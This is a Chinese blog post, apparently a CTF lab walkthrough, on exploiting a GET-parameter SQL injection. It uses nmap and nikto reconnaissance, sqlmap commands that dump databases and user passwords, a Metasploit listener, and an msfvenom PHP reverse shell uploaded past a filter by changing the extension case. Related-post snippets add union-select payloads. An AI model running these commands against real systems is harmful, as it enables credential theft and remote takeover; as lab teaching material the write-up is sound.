SQL注入GET参数

最新推荐文章于 2024-05-01 12:30:53 发布
最新推荐文章于 2024-05-01 12:30:53 发布
阅读量996 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FXHQAQ/article/details/103618922
版权

1、SQL注入漏洞介绍

sql注入攻击指的是通过特殊的输入作为参数拆入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句中进而执行攻击者所要的操作,起主要原因是程序没有细致地过滤用户输入的数据,致使非法数据入侵系统。

SQL注入的产生原因通常表现在以下几个方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交处理不当。

2、信息探测

扫描主机服务信息以及服务版本

—nmap -sV 靶场IP地址

快速扫描主机全部信息

–nmap -T4 -A -v 靶场IP地址

探测敏感信息

–nikto -host http://靶场IP地址:端口

3、深入挖掘

分析nmap、nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;

在nikto扫描的结果下,发现用户登录页面的信息

在这里插入图片描述

使用浏览器打开 http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;

在这里插入图片描述
在这里插入图片描述

尝试admin,发现并不能直接登录到系统当中
我们想要进入系统后台,想到能不能来挖掘到系统当中的漏洞

4、漏洞扫描

web漏洞扫描器 owasp-zap(因为这个工具不更新,已经无法在新版本的Kali中运行了。所以被移除了,在命令行执行这个就可以使用了)

在这里插入图片描述

打开owasp-zap

在这里插入图片描述

输入靶场的IP地址,点击攻击(Attack)

在这里插入图片描述
在这里插入图片描述

左下角可以看到深黄色的旗帜,表示存在高危漏洞

5、漏洞利用

针对web进行漏洞扫描

对扫描的结果进行分析。注意:如果具有SQL注入漏洞,可以直接利用。毕竟SQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

–sqlmap -u url -dbs 查看数据库名

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

发现两个可以利用的数据库名,information_schema是系统自带的数据库

–sqlmap -u url -D “数据库名” -tables 查看对应数据库中的数据表

在这里插入图片描述

返回photoblog数据库中三个表明

在这里插入图片描述

–sqlmap -u url -D “数据库名” -T “表名” -columns 查看对应字段

在这里插入图片描述

返回表中对应的字段!

在这里插入图片描述

–sqlmap -u url -D “数据库名” -T “表名” -C “列名” -dump 查看对应字段的值

在这里插入图片描述

最后返回用户名密码

在这里插入图片描述

也可以直接尝试 sqlmap -u -url -os -shell 直接获取shell
在获取密码后进行登录

在这里插入图片描述

6、上传shell反弹权限

攻击机启动监听

在这里插入图片描述

生成木马文件
启动监听端

在这里插入图片描述

msf > use exploit/multi/handler
msf exploit(hander) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(hander) > set lhost 攻击机IP地址
msf exploit(hander) > set lport 4444
msf exploit(hander) > run

生成反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw > /root/Desktop/shell.php

上传shell执行shell

–绕过过滤机制 利用.php修改为.PHP
最后监听端返回的shell

在这里插入图片描述

7、获取Flag

FXHQAQ
关注
SQL注入 - GET注入与POST注入 一看就会
米兔-miny的博客
12-31 3820
本文章讲了SQL注入中的显错注入(GET注入)和POST注入,一看就能学会。模仿里面的例子在靶场试试手,你就是下一个黑客帝王。
sql 注入POST Get 请求参数到Body常用正则表达式
andy5520的博客
03-31 1251
sql 注入POST Get 请求参数到Body常用正则表达式
SQL注入之基于参数类型注入
DM766924的博客
09-10 388
基于联合查询的注入: 1.判断注入点及闭合方式 1)判断闭合方式 闭合方式有很多种,主要有以下几种 无闭合、'、"、')、")、))等情况 2)利用and 1=1 --+ 判断结果 举例 select * from user where id=1 and 1=1 --+ 结果和不加的一致 3)利用and 1=2 --+判断结果 举例 select * from user where id=1 and 1=2 --+ 结果和不加的完全相反 2.判断查询列数及回显位置 order by 数字
SQL注入之GET型
qq_51393133的博客
09-11 1152
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
SQL注入-GET参数注入
weixin_43850721的博客
01-20 741
CTF练习第一次CTF练习 第一次CTF练习 1.拿到虚拟机后开启 一开始想用外部Xshell连接它,被老冯骂了一顿 2.开启kali用nmap扫描该机器 nmap 192.168.80.135 发现该机器开启了22和80端口 说明该机器开启了ssh和http服务 3.浏览器查看该机器的http服务 http://192.168.80.135 发现网站,有四个页面,前三个是展示界面,第四个是登录界面 尝试登录 4.用burpsuite抓包 尝试进行用户名和密码爆破,失败 失败原因:密码字典不够强大(后面查看
Sql之GET注入
YIGAOYU的博客
04-09 998
Sql之GET注入
sql注入get参数
Vinson的博客
09-27 1295
攻击机192.168.43.61 靶机192.168.43.65 admin弱命令 web漏洞扫描器owasp-zap cross site scripting 高危漏洞 sql注入漏洞,可直接获取服务器权限 使用sqlmap利用sql 注入漏洞 sqlmap -u url --dbs information_schema自带数据库,不用管 sqlma...
SQL注入GET参数注入(提权版)
2303_76679642的博客
04-23 675
4.使用工具破解密码试试,但是我们没工具(OWASP ZAP),所以得先下载。15.开始运行run,然后将刚刚制作的shell内容复制到/home/kali"目录下的"shell.php"文件里面(没有就新建一个),另注意这个文件的后缀名要写成大写的PHP,因为小写的php会被过滤,无法上传。10.看完数据表之后,再看看表里面的字段,因为第一个数据库里面有很多表,这里就不一一展示,重点来看看第二个数据库表里面的字段:sqlmap -u "目标URL" -D "数据库名" -T "表名" -columns。
DB2数据库SQL注入手册1
08-08
2. 参数化查询:使用参数化查询可以防止SQL注入攻击,因为恶意代码无法被作为参数传递。 3. 访问控制:限制数据库访问权限,以防止未经授权的访问。 常见SQL注入攻击 以下是一些常见的SQL注入攻击: 1. Union攻击...
泛微OA8前台sql注入1
08-08
1. 使用预编译的SQL语句(如Java的PreparedStatement),并绑定参数,避免SQL注入。 2. 对用户输入进行严格验证和过滤,只允许预期的字符和格式。 3. 限制应用程序对数据库的权限,避免使用具有广泛权限的数据库连接...
SQL参数化-防SQL注入
08-30
关于SQL参数化的解释,关于参数化的一些自己的见解,参数化主要是为了防止SQL注入
CTF练习:SQL注入之get参数注入
qq_43233085的博客
11-24 4075
CTF练习:靶场夺旗环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本拿到靶机shell 靶机地址: 链接:https://pan.baidu.com/s/1NEvQD8b_4BUFMv9-gW4L6w 提取码:tqtv 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.75.143 查看靶机的IP,为172...
sql注入
qq_49714982的博客
04-06 2796
高版本:在MYSQL5.0以上版本存在一个自带数据库为information_schema,它是一个存储所有数据库名、表名、列名的数据库,相当于可以通过查询它获取指定数据库下面的表名、列名信息。id=1 and 1=2 union select 1,database(),user(),4)union select 1,2,3,4(几个列就写到几,并且让?id=1报错,比如id=-1或者 and 1=2)id=-1 union select 1,group_concat(数据项1),3,4 from。
SQL注入-GET型-单参数-时间型盲注
qq_33505576的博客
09-24 298
1、概要 现在的CTF竞赛,WEB类型的题目,SQL注入可以说是必考题,而且,现在的SQL注入题目越来越难了,各种过滤,所以我们的SQL注入神器SQLMAP基本上可以说是没用了,必须要我们自己写脚本和payload进行手工注入,本篇文章以GET型-单参数-时间型盲注为例,总结一下这类题型的做题方法,不喜勿喷。 2、审题 拿到SQL注入的题目,首先要审题,并结合提示看是考察union select注入、报错注入、盲注还是堆叠注入,难题一般都是考察盲注。判断存在什么类型的注入不难,属于基础内容,这里不进一步去展
CTF实验SQL注入GET参数
floyd_art的博客
03-30 734
SQL注入漏洞介绍 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。   SQL注入的产生原因通常表现在以下几方面:①不当的类型处理;②不安全的数据库配置;③不合理的查询集处理;④不当的错误处理;⑤转义字符处理不合适;⑥多个提交...
SQl注入常见参数
weixin_30409849的博客
07-01 1035
SQL注入常见参数 user(): 数据库用户,格式为user() @server database(): 当前数据库名称。 version(): 当前数据版本,例如5.x.x-n1等......... @@datadir: 数据库路径。通常用于load_file时猜测网站路径等。例如:c:\xxxx\xxxxx...
SQL注入--get注入
weixin_52151447的博客
11-11 2457
SQL注入--get注入 get为网页传参方式,常见的传参方式有GET、POST传参; GET与POST传参方式主要的区别在于,GET方式请求传参时,参数会在URL中显示,而POST没有显示; 注入:用户输入的字符被当做代码执行; 注入方法: 1、判断页面中是否存在注入 and 1=2 ,查询结果报错说明语句当做代码被执行; 2、判断数据表中字段 order by 4显示错误,故有3个字段; 3、查找显错位 and 1=2 union select 1,2,3 ...
web靶机系列-GET参数注入
rlenew的博客
05-28 473
主机:192.168.136.133 靶机:192.168.136.143 用nmap、dirb扫描靶机 发现有一个网址http://192.168.136.143/admin登陆进去,发现有登陆页面 试用常规的弱口令进行测试发现都不行,转换思路,看看有没有其他漏洞可入侵 用owasp-zap扫描 发现有sql注入 利用sqlmap -u http://192.168.136.143/cat.php?id=3 –dbs 有两个数据库 再用sqlmap -u http://192.168.136.1
SQL 注入神器:SQLMap 参数详解
最新发布
Flag少侠的博客
05-01 2885
这些选项可用于创建自定义用户定义函数--udf-inject 注入自定义用户定义函数--shared-lib=SHLIB 共享库的本地路径。
sql注入getshell
09-09
### 回答1: SQL注入攻击是一种通过构造恶意的SQL语句来破坏数据库安全的技术。...总之,SQL注入是一种严重的安全问题,开发者应该重视,并采取相应的安全措施来防止SQL注入GetShell漏洞的发生,保护用户和系统的安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值